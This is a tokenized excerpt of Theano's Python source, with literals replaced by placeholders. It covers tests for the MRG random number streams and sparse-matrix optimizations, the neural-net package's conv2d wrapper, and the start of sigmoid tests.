mode != '<STR_LIT>' and cuda_available : <EOL> R = MRG_RandomStreams ( <NUM_LIT> , use_cuda = True ) <EOL> u = R . binomial ( size = size , p = mean , dtype = '<STR_LIT>' ) <EOL> assert u . dtype == '<STR_LIT>' <EOL> f = theano . function ( var_input , theano . Out ( <EOL> theano . sandbox . cuda . basic_ops . gpu_from_host ( u ) , <EOL> borrow = True ) , mode = mode_with_gpu ) <EOL> gpu_out = numpy . asarray ( f ( * input ) ) <EOL> basictest ( f , steps_ , const_size , prefix = '<STR_LIT>' , <EOL> inputs = input , allow_01 = True , <EOL> target_avg = mean , mean_rtol = rtol ) <EOL> numpy . testing . assert_array_almost_equal ( out , gpu_out , <EOL> decimal = <NUM_LIT:6> ) <EOL> RR = theano . tensor . shared_randomstreams . RandomStreams ( <NUM_LIT> ) <EOL> uu = RR . binomial ( size = size , p = mean ) <EOL> ff = theano . 
function ( var_input , uu , mode = mode ) <EOL> basictest ( ff , steps_ , const_size , prefix = '<STR_LIT>' , allow_01 = True , <EOL> inputs = input , target_avg = mean , mean_rtol = rtol ) <EOL> @ attr ( '<STR_LIT>' ) <EOL> def test_normal0 ( ) : <EOL> steps = <NUM_LIT:50> <EOL> std = <NUM_LIT> <EOL> if ( mode in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] or <EOL> mode == '<STR_LIT>' and config . linker in [ '<STR_LIT>' ] ) : <EOL> sample_size = ( <NUM_LIT> , <NUM_LIT:30> ) <EOL> default_rtol = <NUM_LIT> <EOL> else : <EOL> sample_size = ( <NUM_LIT> , <NUM_LIT:50> ) <EOL> default_rtol = <NUM_LIT> <EOL> sample_size_odd = ( sample_size [ <NUM_LIT:0> ] , sample_size [ <NUM_LIT:1> ] - <NUM_LIT:1> ) <EOL> x = tensor . matrix ( ) <EOL> for size , const_size , var_input , input , avg , rtol , std_tol in [ <EOL> ( sample_size , sample_size , [ ] , [ ] , - <NUM_LIT> , default_rtol , default_rtol ) , <EOL> ( x . shape , sample_size , [ x ] , <EOL> [ numpy . zeros ( sample_size , dtype = config . floatX ) ] , <EOL> - <NUM_LIT> , default_rtol , default_rtol ) , <EOL> ( ( x . shape [ <NUM_LIT:0> ] , sample_size [ <NUM_LIT:1> ] ) , sample_size , [ x ] , <EOL> [ numpy . zeros ( sample_size , dtype = config . floatX ) ] , <EOL> - <NUM_LIT> , default_rtol , default_rtol ) , <EOL> ( sample_size_odd , sample_size_odd , [ ] , [ ] , - <NUM_LIT> , <EOL> default_rtol , default_rtol ) , <EOL> ( x . shape , sample_size_odd , [ x ] , <EOL> [ numpy . zeros ( sample_size_odd , dtype = config . floatX ) ] , <EOL> - <NUM_LIT> , default_rtol , default_rtol ) , <EOL> ( sample_size , sample_size , [ ] , [ ] , <EOL> numpy . arange ( numpy . prod ( sample_size ) , <EOL> dtype = '<STR_LIT>' ) . reshape ( sample_size ) , <EOL> <NUM_LIT> * std / numpy . 
sqrt ( steps ) , default_rtol ) , <EOL> ( ( ) , ( ) , [ ] , [ ] , - <NUM_LIT> , default_rtol , <NUM_LIT> ) , <EOL> ( ( <NUM_LIT:1> , ) , ( <NUM_LIT:1> , ) , [ ] , [ ] , - <NUM_LIT> , default_rtol , <NUM_LIT> ) , <EOL> ( ( <NUM_LIT:2> , ) , ( <NUM_LIT:2> , ) , [ ] , [ ] , - <NUM_LIT> , default_rtol , <NUM_LIT> ) , <EOL> ( ( <NUM_LIT:3> , ) , ( <NUM_LIT:3> , ) , [ ] , [ ] , - <NUM_LIT> , default_rtol , <NUM_LIT> ) , <EOL> ] : <EOL> R = MRG_RandomStreams ( <NUM_LIT> , use_cuda = False ) <EOL> n = R . normal ( size = size , avg = avg , std = std , <EOL> nstreams = rng_mrg . guess_n_streams ( size , warn = False ) ) <EOL> f = theano . function ( var_input , n , mode = mode ) <EOL> out = f ( * input ) <EOL> if numpy . prod ( const_size ) < <NUM_LIT:10> : <EOL> steps_ = steps * <NUM_LIT:50> <EOL> else : <EOL> steps_ = steps <EOL> basictest ( f , steps_ , const_size , target_avg = avg , target_std = std , <EOL> prefix = '<STR_LIT>' , allow_01 = True , inputs = input , <EOL> mean_rtol = rtol , std_tol = std_tol ) <EOL> sys . stdout . flush ( ) <EOL> if mode != '<STR_LIT>' and cuda_available : <EOL> R = MRG_RandomStreams ( <NUM_LIT> , use_cuda = True ) <EOL> n = R . normal ( size = size , avg = avg , std = std , dtype = '<STR_LIT>' , <EOL> nstreams = rng_mrg . guess_n_streams ( size , warn = False ) ) <EOL> assert n . dtype == '<STR_LIT>' <EOL> f = theano . function ( var_input , theano . Out ( <EOL> theano . sandbox . cuda . basic_ops . gpu_from_host ( n ) , <EOL> borrow = True ) , mode = mode_with_gpu ) <EOL> sys . stdout . flush ( ) <EOL> gpu_out = numpy . asarray ( f ( * input ) ) <EOL> sys . stdout . flush ( ) <EOL> basictest ( f , steps_ , const_size , target_avg = avg , target_std = std , <EOL> prefix = '<STR_LIT>' , allow_01 = True , inputs = input , <EOL> mean_rtol = rtol , std_tol = std_tol ) <EOL> assert numpy . allclose ( out , gpu_out , rtol = <NUM_LIT> , atol = <NUM_LIT> ) <EOL> RR = theano . tensor . shared_randomstreams . 
RandomStreams ( <NUM_LIT> ) <EOL> nn = RR . normal ( size = size , avg = avg , std = std ) <EOL> ff = theano . function ( var_input , nn ) <EOL> basictest ( ff , steps_ , const_size , target_avg = avg , target_std = std , <EOL> prefix = '<STR_LIT>' , allow_01 = True , inputs = input , mean_rtol = rtol ) <EOL> def basic_multinomialtest ( f , steps , sample_size , target_pvals , n_samples , <EOL> prefix = "<STR_LIT>" , mean_rtol = <NUM_LIT> ) : <EOL> dt = <NUM_LIT:0.0> <EOL> avg_pvals = numpy . zeros ( target_pvals . shape , dtype = config . floatX ) <EOL> for i in xrange ( steps ) : <EOL> t0 = time . time ( ) <EOL> ival = f ( ) <EOL> assert ival . shape == sample_size <EOL> assert numpy . all ( numpy . sum ( ival , axis = <NUM_LIT:1> ) == n_samples ) <EOL> dt += time . time ( ) - t0 <EOL> avg_pvals += ival <EOL> avg_pvals /= ( steps * n_samples ) <EOL> assert numpy . mean ( abs ( avg_pvals - target_pvals ) ) < mean_rtol <EOL> print ( '<STR_LIT>' , numpy . asarray ( f ( ) [ : <NUM_LIT:10> ] ) ) <EOL> print ( prefix , '<STR_LIT>' , avg_pvals ) <EOL> print ( numpy . mean ( abs ( avg_pvals - target_pvals ) ) ) <EOL> print ( prefix , '<STR_LIT:time>' , dt ) <EOL> print ( prefix , '<STR_LIT>' , steps * numpy . prod ( target_pvals . shape ) ) <EOL> print ( prefix , '<STR_LIT>' , steps * numpy . prod ( target_pvals . shape ) / dt ) <EOL> def test_multinomial ( ) : <EOL> steps = <NUM_LIT:100> <EOL> mode_ = mode <EOL> if mode == '<STR_LIT>' : <EOL> mode_ = '<STR_LIT>' <EOL> if ( mode in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] or <EOL> mode == '<STR_LIT>' and config . linker in [ '<STR_LIT>' ] ) : <EOL> sample_size = ( <NUM_LIT> , <NUM_LIT:5> ) <EOL> else : <EOL> sample_size = ( <NUM_LIT> , <NUM_LIT:6> ) <EOL> mode_ = theano . compile . mode . get_mode ( mode_ ) <EOL> pvals = numpy . asarray ( numpy . random . uniform ( size = sample_size ) ) <EOL> pvals = numpy . apply_along_axis ( lambda row : row / numpy . 
sum ( row ) , <NUM_LIT:1> , pvals ) <EOL> R = MRG_RandomStreams ( <NUM_LIT> , use_cuda = False ) <EOL> m = R . multinomial ( pvals = pvals , dtype = config . floatX , nstreams = <NUM_LIT:30> * <NUM_LIT> ) <EOL> f = theano . function ( [ ] , m , mode = mode_ ) <EOL> out = f ( ) <EOL> basic_multinomialtest ( f , steps , sample_size , pvals , n_samples = <NUM_LIT:1> , <EOL> prefix = '<STR_LIT>' ) <EOL> sys . stdout . flush ( ) <EOL> if mode != '<STR_LIT>' and cuda_available : <EOL> R = MRG_RandomStreams ( <NUM_LIT> , use_cuda = True ) <EOL> pvals = numpy . asarray ( pvals , dtype = '<STR_LIT>' ) <EOL> n = R . multinomial ( pvals = pvals , dtype = '<STR_LIT>' , nstreams = <NUM_LIT:30> * <NUM_LIT> ) <EOL> assert n . dtype == '<STR_LIT>' <EOL> f = theano . function ( <EOL> [ ] , <EOL> theano . sandbox . cuda . basic_ops . gpu_from_host ( n ) , <EOL> mode = mode_ . including ( '<STR_LIT>' ) ) <EOL> gpu_out = f ( ) <EOL> sys . stdout . flush ( ) <EOL> basic_multinomialtest ( f , steps , sample_size , pvals , n_samples = <NUM_LIT:1> , <EOL> prefix = '<STR_LIT>' ) <EOL> numpy . testing . assert_array_almost_equal ( out , gpu_out , decimal = <NUM_LIT:6> ) <EOL> def test_multinomial_n_samples ( ) : <EOL> mode_ = mode <EOL> if mode == '<STR_LIT>' : <EOL> mode_ = '<STR_LIT>' <EOL> if ( mode in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] or <EOL> mode == '<STR_LIT>' and config . linker in [ '<STR_LIT>' ] ) : <EOL> sample_size = ( <NUM_LIT> , <NUM_LIT:5> ) <EOL> else : <EOL> sample_size = ( <NUM_LIT> , <NUM_LIT:6> ) <EOL> mode_ = theano . compile . mode . get_mode ( mode_ ) <EOL> pvals = numpy . asarray ( numpy . random . uniform ( size = sample_size ) ) <EOL> pvals = numpy . apply_along_axis ( lambda row : row / numpy . 
sum ( row ) , <NUM_LIT:1> , pvals ) <EOL> R = MRG_RandomStreams ( <NUM_LIT> , use_cuda = False ) <EOL> for n_samples , steps in zip ( [ <NUM_LIT:5> , <NUM_LIT:10> , <NUM_LIT:100> , <NUM_LIT:1000> ] , [ <NUM_LIT:20> , <NUM_LIT:10> , <NUM_LIT:1> , <NUM_LIT:1> ] ) : <EOL> m = R . multinomial ( pvals = pvals , n = n_samples , <EOL> dtype = config . floatX , nstreams = <NUM_LIT:30> * <NUM_LIT> ) <EOL> f = theano . function ( [ ] , m , mode = mode_ ) <EOL> basic_multinomialtest ( f , steps , sample_size , pvals , <EOL> n_samples , prefix = '<STR_LIT>' ) <EOL> sys . stdout . flush ( ) <EOL> if mode != '<STR_LIT>' and cuda_available : <EOL> R = MRG_RandomStreams ( <NUM_LIT> , use_cuda = True ) <EOL> pvals = numpy . asarray ( pvals , dtype = '<STR_LIT>' ) <EOL> n = R . multinomial ( pvals = pvals , n = n_samples , <EOL> dtype = '<STR_LIT>' , nstreams = <NUM_LIT:30> * <NUM_LIT> ) <EOL> assert n . dtype == '<STR_LIT>' <EOL> f = theano . function ( <EOL> [ ] , <EOL> theano . sandbox . cuda . basic_ops . gpu_from_host ( n ) , <EOL> mode = mode_ . including ( '<STR_LIT>' ) ) <EOL> sys . stdout . flush ( ) <EOL> basic_multinomialtest ( f , steps , sample_size , pvals , <EOL> n_samples , prefix = '<STR_LIT>' ) <EOL> class T_MRG ( unittest . TestCase ) : <EOL> def test_bad_size ( self ) : <EOL> R = MRG_RandomStreams ( <NUM_LIT> , use_cuda = False ) <EOL> for size in [ <EOL> ( <NUM_LIT:0> , <NUM_LIT:100> ) , <EOL> ( - <NUM_LIT:1> , <NUM_LIT:100> ) , <EOL> ( <NUM_LIT:1> , <NUM_LIT:0> ) , <EOL> ] : <EOL> self . assertRaises ( ValueError , R . uniform , size ) <EOL> self . assertRaises ( ValueError , R . binomial , size ) <EOL> self . assertRaises ( ValueError , R . multinomial , size , <NUM_LIT:1> , [ ] ) <EOL> self . assertRaises ( ValueError , R . normal , size ) <EOL> def test_multiple_rng_aliasing ( ) : <EOL> """<STR_LIT>""" <EOL> rng1 = MRG_RandomStreams ( <NUM_LIT> ) <EOL> rng2 = MRG_RandomStreams ( <NUM_LIT> ) <EOL> assert rng1 . state_updates is not rng2 . 
state_updates <EOL> def test_random_state_transfer ( ) : <EOL> """<STR_LIT>""" <EOL> class Graph : <EOL> def __init__ ( self , seed = <NUM_LIT> ) : <EOL> self . rng = MRG_RandomStreams ( seed ) <EOL> self . y = self . rng . uniform ( size = ( <NUM_LIT:1> , ) ) <EOL> g1 = Graph ( seed = <NUM_LIT> ) <EOL> f1 = theano . function ( [ ] , g1 . y ) <EOL> g2 = Graph ( seed = <NUM_LIT> ) <EOL> f2 = theano . function ( [ ] , g2 . y ) <EOL> g2 . rng . rstate = g1 . rng . rstate <EOL> for ( su1 , su2 ) in zip ( g1 . rng . state_updates , g2 . rng . state_updates ) : <EOL> su2 [ <NUM_LIT:0> ] . set_value ( su1 [ <NUM_LIT:0> ] . get_value ( ) ) <EOL> numpy . testing . assert_array_almost_equal ( f1 ( ) , f2 ( ) , decimal = <NUM_LIT:6> ) <EOL> def test_gradient_scan ( ) : <EOL> theano_rng = MRG_RandomStreams ( <NUM_LIT:10> ) <EOL> w = theano . shared ( numpy . ones ( <NUM_LIT:1> , dtype = '<STR_LIT>' ) ) <EOL> def one_step ( x ) : <EOL> return x + theano_rng . uniform ( ( <NUM_LIT:1> , ) , dtype = '<STR_LIT>' ) * w <EOL> x = tensor . vector ( dtype = '<STR_LIT>' ) <EOL> values , updates = theano . scan ( one_step , outputs_info = x , n_steps = <NUM_LIT:10> ) <EOL> gw = theano . grad ( tensor . sum ( values [ - <NUM_LIT:1> ] ) , w ) <EOL> f = theano . function ( [ x ] , gw ) <EOL> f ( numpy . arange ( <NUM_LIT:1> , dtype = '<STR_LIT>' ) ) <EOL> def test_multMatVect ( ) : <EOL> A1 = tensor . lmatrix ( '<STR_LIT>' ) <EOL> s1 = tensor . ivector ( '<STR_LIT>' ) <EOL> m1 = tensor . iscalar ( '<STR_LIT>' ) <EOL> A2 = tensor . lmatrix ( '<STR_LIT>' ) <EOL> s2 = tensor . ivector ( '<STR_LIT>' ) <EOL> m2 = tensor . iscalar ( '<STR_LIT>' ) <EOL> g0 = rng_mrg . DotModulo ( ) ( A1 , s1 , m1 , A2 , s2 , m2 ) <EOL> f0 = theano . function ( [ A1 , s1 , m1 , A2 , s2 , m2 ] , g0 ) <EOL> i32max = numpy . iinfo ( numpy . int32 ) . max <EOL> A1 = numpy . random . randint ( <NUM_LIT:0> , i32max , ( <NUM_LIT:3> , <NUM_LIT:3> ) ) . astype ( '<STR_LIT>' ) <EOL> s1 = numpy . random . 
randint ( <NUM_LIT:0> , i32max , <NUM_LIT:3> ) . astype ( '<STR_LIT>' ) <EOL> m1 = numpy . asarray ( numpy . random . randint ( i32max ) , dtype = "<STR_LIT>" ) <EOL> A2 = numpy . random . randint ( <NUM_LIT:0> , i32max , ( <NUM_LIT:3> , <NUM_LIT:3> ) ) . astype ( '<STR_LIT>' ) <EOL> s2 = numpy . random . randint ( <NUM_LIT:0> , i32max , <NUM_LIT:3> ) . astype ( '<STR_LIT>' ) <EOL> m2 = numpy . asarray ( numpy . random . randint ( i32max ) , dtype = "<STR_LIT>" ) <EOL> f0 . input_storage [ <NUM_LIT:0> ] . storage [ <NUM_LIT:0> ] = A1 <EOL> f0 . input_storage [ <NUM_LIT:1> ] . storage [ <NUM_LIT:0> ] = s1 <EOL> f0 . input_storage [ <NUM_LIT:2> ] . storage [ <NUM_LIT:0> ] = m1 <EOL> f0 . input_storage [ <NUM_LIT:3> ] . storage [ <NUM_LIT:0> ] = A2 <EOL> f0 . input_storage [ <NUM_LIT:4> ] . storage [ <NUM_LIT:0> ] = s2 <EOL> f0 . input_storage [ <NUM_LIT:5> ] . storage [ <NUM_LIT:0> ] = m2 <EOL> r_a1 = rng_mrg . matVecModM ( A1 , s1 , m1 ) <EOL> r_a2 = rng_mrg . matVecModM ( A2 , s2 , m2 ) <EOL> f0 . fn ( ) <EOL> r_b = f0 . output_storage [ <NUM_LIT:0> ] . value <EOL> assert numpy . allclose ( r_a1 , r_b [ : <NUM_LIT:3> ] ) <EOL> assert numpy . allclose ( r_a2 , r_b [ <NUM_LIT:3> : ] ) <EOL> def test_seed_fn ( ) : <EOL> test_use_cuda = [ False ] <EOL> if cuda_available : <EOL> test_use_cuda . append ( True ) <EOL> idx = tensor . ivector ( ) <EOL> for use_cuda in test_use_cuda : <EOL> if config . mode == '<STR_LIT>' and use_cuda : <EOL> mode = '<STR_LIT>' <EOL> else : <EOL> mode = config . mode <EOL> for new_seed , same in [ ( <NUM_LIT> , True ) , ( None , True ) , ( <NUM_LIT> , False ) ] : <EOL> random = MRG_RandomStreams ( <NUM_LIT> , use_cuda = use_cuda ) <EOL> fn1 = theano . function ( [ ] , random . uniform ( ( <NUM_LIT:2> , <NUM_LIT:2> ) , dtype = '<STR_LIT>' ) , <EOL> mode = mode ) <EOL> fn2 = theano . function ( [ ] , random . 
uniform ( ( <NUM_LIT:3> , <NUM_LIT:3> ) , nstreams = <NUM_LIT:2> , <EOL> dtype = '<STR_LIT>' ) , <EOL> mode = mode ) <EOL> fn3 = theano . function ( [ idx ] , <EOL> random . uniform ( idx , nstreams = <NUM_LIT:3> , ndim = <NUM_LIT:1> , <EOL> dtype = '<STR_LIT>' ) , <EOL> mode = mode ) <EOL> fn1_val0 = fn1 ( ) <EOL> fn1_val1 = fn1 ( ) <EOL> assert not numpy . allclose ( fn1_val0 , fn1_val1 ) <EOL> fn2_val0 = fn2 ( ) <EOL> fn2_val1 = fn2 ( ) <EOL> assert not numpy . allclose ( fn2_val0 , fn2_val1 ) <EOL> fn3_val0 = fn3 ( [ <NUM_LIT:4> ] ) <EOL> fn3_val1 = fn3 ( [ <NUM_LIT:4> ] ) <EOL> assert not numpy . allclose ( fn3_val0 , fn3_val1 ) <EOL> assert fn1_val0 . size == <NUM_LIT:4> <EOL> assert fn2_val0 . size == <NUM_LIT:9> <EOL> random . seed ( new_seed ) <EOL> fn1_val2 = fn1 ( ) <EOL> fn1_val3 = fn1 ( ) <EOL> fn2_val2 = fn2 ( ) <EOL> fn2_val3 = fn2 ( ) <EOL> fn3_val2 = fn3 ( [ <NUM_LIT:4> ] ) <EOL> fn3_val3 = fn3 ( [ <NUM_LIT:4> ] ) <EOL> assert numpy . allclose ( fn1_val0 , fn1_val2 ) == same <EOL> assert numpy . allclose ( fn1_val1 , fn1_val3 ) == same <EOL> assert numpy . allclose ( fn2_val0 , fn2_val2 ) == same <EOL> assert numpy . allclose ( fn2_val1 , fn2_val3 ) == same <EOL> assert numpy . allclose ( fn3_val0 , fn3_val2 ) == same <EOL> assert numpy . allclose ( fn3_val1 , fn3_val3 ) == same <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> rng = MRG_RandomStreams ( numpy . random . randint ( <NUM_LIT> ) ) <EOL> print ( theano . __file__ ) <EOL> pvals = theano . tensor . fmatrix ( ) <EOL> for i in range ( <NUM_LIT:10> ) : <EOL> t0 = time . time ( ) <EOL> multinomial = rng . multinomial ( pvals = pvals ) <EOL> print ( time . time ( ) - t0 ) </s>
<s> from nose . plugins . skip import SkipTest <EOL> import numpy <EOL> try : <EOL> import scipy . sparse as sp <EOL> import scipy . sparse <EOL> except ImportError : <EOL> pass <EOL> import theano <EOL> from theano import sparse , config , tensor <EOL> from theano . sparse import enable_sparse <EOL> if not enable_sparse : <EOL> raise SkipTest ( '<STR_LIT>' ) <EOL> from theano . sparse . tests . test_basic import random_lil <EOL> def test_local_csm_properties_csm ( ) : <EOL> data = tensor . vector ( ) <EOL> indices , indptr , shape = ( tensor . ivector ( ) , tensor . ivector ( ) , <EOL> tensor . ivector ( ) ) <EOL> mode = theano . compile . mode . get_default_mode ( ) <EOL> mode = mode . including ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> for CS , cast in [ ( sparse . CSC , sp . csc_matrix ) , <EOL> ( sparse . CSR , sp . csr_matrix ) ] : <EOL> f = theano . function ( [ data , indices , indptr , shape ] , <EOL> sparse . csm_properties ( <EOL> CS ( data , indices , indptr , shape ) ) , <EOL> mode = mode ) <EOL> assert not any ( <EOL> isinstance ( node . op , ( sparse . CSM , sparse . CSMProperties ) ) <EOL> for node in f . maker . fgraph . toposort ( ) ) <EOL> v = cast ( random_lil ( ( <NUM_LIT:10> , <NUM_LIT> ) , <EOL> config . floatX , <NUM_LIT:3> ) ) <EOL> f ( v . data , v . indices , v . indptr , v . shape ) <EOL> def test_local_csm_grad_c ( ) : <EOL> raise SkipTest ( "<STR_LIT>" ) <EOL> if not theano . config . cxx : <EOL> raise SkipTest ( "<STR_LIT>" ) <EOL> data = tensor . vector ( ) <EOL> indices , indptr , shape = ( tensor . ivector ( ) , tensor . ivector ( ) , <EOL> tensor . ivector ( ) ) <EOL> mode = theano . compile . mode . get_default_mode ( ) <EOL> if theano . config . mode == '<STR_LIT>' : <EOL> mode = theano . compile . Mode ( linker = '<STR_LIT>' , optimizer = '<STR_LIT>' ) <EOL> mode = mode . including ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> for CS , cast in [ ( sparse . CSC , sp . csc_matrix ) , ( sparse . CSR , sp . csr_matrix ) ] : <EOL> cost = tensor . 
sum ( sparse . DenseFromSparse ( ) ( CS ( data , indices , indptr , shape ) ) ) <EOL> f = theano . function ( <EOL> [ data , indices , indptr , shape ] , <EOL> tensor . grad ( cost , data ) , <EOL> mode = mode ) <EOL> assert not any ( isinstance ( node . op , sparse . CSMGrad ) for node <EOL> in f . maker . fgraph . toposort ( ) ) <EOL> v = cast ( random_lil ( ( <NUM_LIT:10> , <NUM_LIT> ) , <EOL> config . floatX , <NUM_LIT:3> ) ) <EOL> f ( v . data , v . indices , v . indptr , v . shape ) <EOL> def test_local_mul_s_d ( ) : <EOL> if not theano . config . cxx : <EOL> raise SkipTest ( "<STR_LIT>" ) <EOL> mode = theano . compile . mode . get_default_mode ( ) <EOL> mode = mode . including ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> for sp_format in sparse . sparse_formats : <EOL> inputs = [ getattr ( theano . sparse , sp_format + '<STR_LIT>' ) ( ) , <EOL> tensor . matrix ( ) ] <EOL> f = theano . function ( inputs , <EOL> sparse . mul_s_d ( * inputs ) , <EOL> mode = mode ) <EOL> assert not any ( isinstance ( node . op , sparse . MulSD ) for node <EOL> in f . maker . fgraph . toposort ( ) ) <EOL> def test_local_mul_s_v ( ) : <EOL> if not theano . config . cxx : <EOL> raise SkipTest ( "<STR_LIT>" ) <EOL> mode = theano . compile . mode . get_default_mode ( ) <EOL> mode = mode . including ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> for sp_format in [ '<STR_LIT>' ] : <EOL> inputs = [ getattr ( theano . sparse , sp_format + '<STR_LIT>' ) ( ) , <EOL> tensor . vector ( ) ] <EOL> f = theano . function ( inputs , <EOL> sparse . mul_s_v ( * inputs ) , <EOL> mode = mode ) <EOL> assert not any ( isinstance ( node . op , sparse . MulSV ) for node <EOL> in f . maker . fgraph . toposort ( ) ) <EOL> def test_local_structured_add_s_v ( ) : <EOL> if not theano . config . cxx : <EOL> raise SkipTest ( "<STR_LIT>" ) <EOL> mode = theano . compile . mode . get_default_mode ( ) <EOL> mode = mode . 
including ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> for sp_format in [ '<STR_LIT>' ] : <EOL> inputs = [ getattr ( theano . sparse , sp_format + '<STR_LIT>' ) ( ) , <EOL> tensor . vector ( ) ] <EOL> f = theano . function ( inputs , <EOL> sparse . structured_add_s_v ( * inputs ) , <EOL> mode = mode ) <EOL> assert not any ( isinstance ( node . op , sparse . StructuredAddSV ) for node <EOL> in f . maker . fgraph . toposort ( ) ) <EOL> def test_local_sampling_dot_csr ( ) : <EOL> if not theano . config . cxx : <EOL> raise SkipTest ( "<STR_LIT>" ) <EOL> mode = theano . compile . mode . get_default_mode ( ) <EOL> mode = mode . including ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> for sp_format in [ '<STR_LIT>' ] : <EOL> inputs = [ tensor . matrix ( ) , <EOL> tensor . matrix ( ) , <EOL> getattr ( theano . sparse , sp_format + '<STR_LIT>' ) ( ) ] <EOL> f = theano . function ( inputs , <EOL> sparse . sampling_dot ( * inputs ) , <EOL> mode = mode ) <EOL> if theano . config . blas . ldflags : <EOL> assert not any ( isinstance ( node . op , sparse . SamplingDot ) for node <EOL> in f . maker . fgraph . toposort ( ) ) <EOL> else : <EOL> assert not any ( isinstance ( node . op , sparse . opt . SamplingDotCSR ) for node <EOL> in f . maker . fgraph . toposort ( ) ) <EOL> def test_local_dense_from_sparse_sparse_from_dense ( ) : <EOL> mode = theano . compile . mode . get_default_mode ( ) <EOL> mode = mode . including ( "<STR_LIT>" ) <EOL> m = theano . tensor . matrix ( ) <EOL> for op in [ theano . sparse . csr_from_dense , theano . sparse . csc_from_dense ] : <EOL> s = op ( m ) <EOL> o = theano . sparse . dense_from_sparse ( s ) <EOL> f = theano . function ( [ m ] , o , mode = mode ) <EOL> assert len ( f . maker . fgraph . apply_nodes ) == <NUM_LIT:1> <EOL> f ( [ [ <NUM_LIT:1> , <NUM_LIT:2> ] , [ <NUM_LIT:3> , <NUM_LIT:4> ] ] ) <EOL> def test_sd_csc ( ) : <EOL> A = sp . rand ( <NUM_LIT:4> , <NUM_LIT:5> , density = <NUM_LIT> , format = '<STR_LIT>' , dtype = numpy . float32 ) <EOL> b = numpy . 
random . rand ( <NUM_LIT:5> , <NUM_LIT:2> ) . astype ( numpy . float32 ) <EOL> target = A * b <EOL> a_val = theano . tensor . as_tensor_variable ( A . data ) <EOL> a_ind = theano . tensor . as_tensor_variable ( A . indices ) <EOL> a_ptr = theano . tensor . as_tensor_variable ( A . indptr ) <EOL> nrows = theano . tensor . as_tensor_variable ( numpy . int32 ( A . shape [ <NUM_LIT:0> ] ) ) <EOL> b = theano . tensor . as_tensor_variable ( b ) <EOL> res = theano . sparse . opt . sd_csc ( a_val , a_ind , a_ptr , nrows , b ) . eval ( ) <EOL> assert ( res == target ) . all ( ) </s>
<s> from . nnet import ( <EOL> CrossentropyCategorical1Hot , CrossentropyCategorical1HotGrad , <EOL> CrossentropySoftmax1HotWithBiasDx , CrossentropySoftmaxArgmax1HotWithBias , <EOL> LogSoftmax , Prepend_scalar_constant_to_each_row , <EOL> Prepend_scalar_to_each_row , Softmax , <EOL> SoftmaxGrad , SoftmaxWithBias , binary_crossentropy , <EOL> categorical_crossentropy , crossentropy_categorical_1hot , <EOL> crossentropy_categorical_1hot_grad , crossentropy_softmax_1hot , <EOL> crossentropy_softmax_1hot_with_bias , <EOL> crossentropy_softmax_1hot_with_bias_dx , <EOL> crossentropy_softmax_argmax_1hot_with_bias , <EOL> crossentropy_softmax_max_and_argmax_1hot , <EOL> crossentropy_softmax_max_and_argmax_1hot_with_bias , <EOL> crossentropy_to_crossentropy_with_softmax , <EOL> crossentropy_to_crossentropy_with_softmax_with_bias , <EOL> graph_merge_softmax_with_crossentropy_softmax , h_softmax , <EOL> logsoftmax , logsoftmax_op , prepend_0_to_each_row , prepend_1_to_each_row , <EOL> prepend_scalar_to_each_row , relu , softmax , softmax_grad , softmax_graph , <EOL> softmax_op , softmax_simplifier , softmax_with_bias , elu ) <EOL> from . import opt <EOL> from . conv import ConvOp <EOL> from . Conv3D import * <EOL> from . ConvGrad3D import * <EOL> from . ConvTransp3D import * <EOL> from . sigm import ( softplus , sigmoid , sigmoid_inplace , <EOL> scalar_sigmoid , ultra_fast_sigmoid , <EOL> hard_sigmoid ) <EOL> from . bn import batch_normalization <EOL> import warnings <EOL> from . abstract_conv import conv2d as abstract_conv2d <EOL> def conv2d ( input , filters , input_shape = None , filter_shape = None , <EOL> border_mode = '<STR_LIT>' , subsample = ( <NUM_LIT:1> , <NUM_LIT:1> ) , filter_flip = True , <EOL> image_shape = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' in kwargs or '<STR_LIT>' in kwargs : <EOL> raise ValueError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if len ( kwargs . 
keys ( ) ) > <NUM_LIT:0> : <EOL> warnings . warn ( str ( kwargs . keys ( ) ) + <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> stacklevel = <NUM_LIT:2> ) <EOL> if image_shape is not None : <EOL> warnings . warn ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> stacklevel = <NUM_LIT:2> ) <EOL> if input_shape is None : <EOL> input_shape = image_shape <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return abstract_conv2d ( input , filters , input_shape , filter_shape , <EOL> border_mode , subsample , filter_flip ) </s>
<s> from __future__ import print_function <EOL> import unittest <EOL> import numpy <EOL> from theano . compat import imap <EOL> import theano . tensor . inplace <EOL> from theano . tensor import basic as tensor <EOL> from theano import tensor as T <EOL> from theano import config <EOL> from theano . tests import unittest_tools as utt <EOL> from theano . tensor . nnet import ( sigmoid , sigmoid_inplace , <EOL> softplus , ultra_fast_sigmoid , hard_sigmoid ) <EOL> from theano . tensor . nnet . sigm import ( <EOL> compute_mul , is_1pexp , parse_mul_tree , perform_sigm_times_exp , <EOL> register_local_1msigmoid , simplify_mul , <EOL> ) <EOL> from theano . tensor . tests . test_basic import ( makeBroadcastTester , rand , <EOL> check_floatX , upcast_int8_nfunc , <EOL> _good_broadcast_unary_normal_no_complex ) <EOL> class T_sigmoid ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> utt . seed_rng ( ) <EOL> def test_elemwise ( self ) : <EOL> utt . verify_grad ( sigmoid , [ numpy . random . rand ( <NUM_LIT:3> , <NUM_LIT:4> ) ] ) <EOL> SigmoidTester = makeBroadcastTester ( <EOL> op = sigmoid , <EOL> expected = upcast_int8_nfunc ( lambda inputs : check_floatX ( <EOL> inputs , <NUM_LIT:1> / ( <NUM_LIT:1> + numpy . exp ( - inputs ) ) ) ) , 